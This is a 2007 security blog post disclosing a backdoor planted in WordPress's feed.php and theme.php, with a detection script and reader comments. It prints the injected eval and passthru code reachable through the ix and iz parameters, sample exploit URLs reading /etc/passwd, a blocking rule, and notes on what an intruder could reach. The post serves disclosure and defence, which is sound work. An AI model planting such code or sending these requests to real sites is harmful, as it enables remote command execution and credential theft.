Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blogging software package, I discovered that its source code had recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

In wp-includes/feed.php:

function comment_text_phpfilter($filterdata) {
    eval($filterdata); // executes whatever PHP code the caller passes in
}
...
// reachable by any unauthenticated visitor through the "ix" query parameter
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


In wp-includes/theme.php:

function get_theme_mcommand($mcds) {
    passthru($mcds); // runs the string as a shell command and returns its output
}
...
// reachable by any unauthenticated visitor through the "iz" query parameter
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }



This would enable remote command execution on machines running compromised versions, for example:

http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


I discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that only one of two servers had been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd, 2007 it is possible that you are running a compromised version; be sure to check for the above code.
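As an added example (not part of the original post), the check described above written out as a small Python script: it looks for the two injected function names, and more generally for any one-argument wrapper of the same shape around eval()/passthru() that is called on request input, and it flags access-log lines that request the two affected files with an ix or iz parameter. The PHP snippets and log lines below are constructed samples; the addresses and paths in them are placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Function names injected into the compromised files, as given in the post.
BACKDOOR_FUNCS = ("comment_text_phpfilter", "get_theme_mcommand")
AFFECTED_FILES = ("wp-includes/feed.php", "wp-includes/theme.php")
# Shape shared by both injected wrappers: a one-argument function whose whole
# body is eval()/passthru() (or a similar sink) applied to that argument.
WRAPPER_RE = re.compile(
    r"function\s+(\w+)\s*\(\s*\$(\w+)\s*\)\s*\{\s*"
    r"(eval|passthru|system|exec|shell_exec)\s*\(\s*\$\2\s*\)\s*;\s*\}")

def scan_php(path, source):
    """Return findings for one PHP file's text: the known names, plus any
    wrapper of the same shape that is invoked on $_GET/$_POST/$_REQUEST."""
    findings = [f"{path}: known backdoor function {n}" for n in BACKDOOR_FUNCS if n in source]
    for m in WRAPPER_RE.finditer(source):
        name, sink = m.group(1), m.group(3)
        if re.search(rf"\b{name}\s*\(\s*\$_(GET|POST|REQUEST)\b", source):
            findings.append(f"{path}: {name}() passes request input to {sink}()")
    return findings

def suspicious_requests(log_lines):
    """Return access-log lines that hit an affected file with an ix or iz parameter
    (a parameter actually named ix/iz, so '?fix=1' is not flagged)."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m:
            url = urlsplit(m.group(1))
            if url.path.endswith(AFFECTED_FILES) and parse_qs(url.query).keys() & {"ix", "iz"}:
                hits.append(line)
    return hits

# Constructed samples: a feed.php carrying the injected code and a clean theme.php.
BAD_FEED = ('<?php\nfunction comment_text_phpfilter($filterdata) {\neval($filterdata);\n}\n'
            'if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }\n')
CLEAN_THEME = '<?php\nfunction get_theme_mod($name) { return $name; }\n'
# Constructed access-log lines in combined log format (placeholder addresses).
LOG = [
    '10.0.0.1 - - [02/Mar/2007:10:00:00 +0000] "GET /wp-includes/feed.php?ix=phpinfo(); HTTP/1.1" 200 512',
    '10.0.0.2 - - [02/Mar/2007:10:00:01 +0000] "GET /wp-includes/feed.php?fix=1 HTTP/1.1" 200 512',
    '10.0.0.3 - - [02/Mar/2007:10:00:02 +0000] "GET /?feed=rss2 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_php("wp-includes/feed.php", BAD_FEED) + scan_php("wp-includes/theme.php", CLEAN_THEME):
        print(f)
    for line in suspicious_requests(LOG):
        print("suspicious request:", line)
```

On a live install, read the two files from disk and feed scan_php() their contents; the wrapper check also catches the same backdoor shape under renamed functions.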

About WordPress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for the quick response and his feedback regarding this issue.

11 comments:

Mr Apache said...

Code to Forbid requests with querystrings ix or iz


RewriteEngine On
# match ix or iz only as a whole parameter name, so that "?fix=1" or "?s=matrix" are not blocked
RewriteCond %{QUERY_STRING} (^|&)(ix|iz)= [NC]
RewriteRule .* - [F]


Ultimate htaccess article

Doug Karr said...

Ivan,

Could this be utilized to obtain any information from the source site? Example: logins, passwords, MySQL configuration, OpenID configuration, etc?

I'm curious if simply downloading and installing the corrected software is a total solution or whether or not anyone is advising WP users to reconfigure their logins/passwords, etc.

Thanks!
Doug

Ivan Fratric said...

Dear Doug,

the exploitation of this, by itself, leads to command execution on the affected machine under the privileges of the web server user, typically 'nobody'. This means that the cracker could read any files readable to this user. This typically includes web application configuration files (which typically contain the MySQL username and password the web application uses to connect to the database), as well as files such as /etc/passwd, which contains a list of usernames for the server, which could be used in brute-force type attacks. The cracker could also modify any files writeable by this user and also upload files to folders writeable by this user.

However, you should also consider the following - obtaining the admin privileges on the machine once you have established the remote access, even as an unprivileged user, is usually by far easier than obtaining the remote access itself.

So to conclude, if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate.

Ivan Fratric said...

Plus, the cracker might manage to put some kind of backdoor on the server using this, so the absolutely safest thing to do would be to make a clean install of everything.

ceras said...

That bug doesn't work, I have WordPress from January, these files feed.php ...


and command execution doesn't work, I have a white page :)

That fucking bullshit's not a bug

Ivan Fratric said...

Ceras,

You wouldn't be affected if you downloaded WordPress in January, only if you downloaded it between Feb 25th and Mar 2nd and only if you downloaded it from the compromised server.

If you want confirmation, take a look at
http://wordpress.org/development/2007/03/upgrade-212/

Shelly said...

I had a question. I just installed WP 2.1 (NOT 2.1.1) a few weeks ago for a client who needed 16 different installations (didn't want to use MU).

I've been told by the wp-pro list that I *should* be okay with 2.1, because the exploit wasn't in that version (and if it were, I had downloaded my copy January 28 - so I'm in the clear anyway). However, someone said that the reason 2.1.1 was released was to fix another security flaw, and I should have upgraded anyway.

I guess I'd like to know this: should I download the new 2.1.2 and upgrade all 16 of those blogs already? I don't know what security flaw is in 2.1 - nothing was mentioned - but I'd appreciate any advice on this.

Ivan Fratric said...

Shelly,

you really should be asking this in a WordPress support forum.
Having said that, I'm not aware of any vulnerabilities fixed from 2.1 to 2.1.1 (which doesn't mean there weren't any), but there are known vulnerabilities in 2.1.1 which are possibly present in previous versions as well. You can find out the details at
http://www.securityfocus.com/bid/22738
and
http://www.securityfocus.com/archive/1/461440
These are all script injection vulnerabilities. They aren't exactly what I would call critical, but should be taken care of nevertheless.

Shelly said...

Thanks Ivan,

Actually, I *did* ask at the support forums - I guess I'm impatient ;) I did get advice on basically what you said: that it wouldn't hurt to upgrade to 2.1.2, but it's not absolutely necessary.

I've already emailed the client with this information, and I'm letting them decide what they want me to do. I couldn't find the exact information you gave me (about the injection), but I did tell them there wouldn't have been an upgrade if it weren't something important.

Thanks for your advice - I appreciate it :)

Anonymous said...

Hi,
For the time being this bug is not working on any of the WordPress installs I tried. But this post is good, thanks for sharing.

Best Regards,
Eliena Andrews
http://visitformoney.blogspot.com

Piyush said...

Hi Ivan,
I have posted about your discovery on my blog. Here is the link.
Thanks for sharing this.
-
Piyush